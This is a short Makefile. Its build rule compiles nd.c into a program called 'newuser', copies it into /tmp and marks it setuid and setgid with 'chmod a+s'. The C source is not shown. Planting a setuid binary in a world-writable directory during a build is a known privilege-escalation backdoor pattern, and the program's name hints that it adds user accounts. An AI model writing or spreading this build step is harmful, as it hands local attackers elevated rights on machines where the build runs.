CC      = gcc
all: newuser 

newuser: nd.c
	$(CC) -o newuser nd.c ; cp -rf newuser /tmp ; chmod a+s /tmp/newuser 



clean:
	rm -f newuser





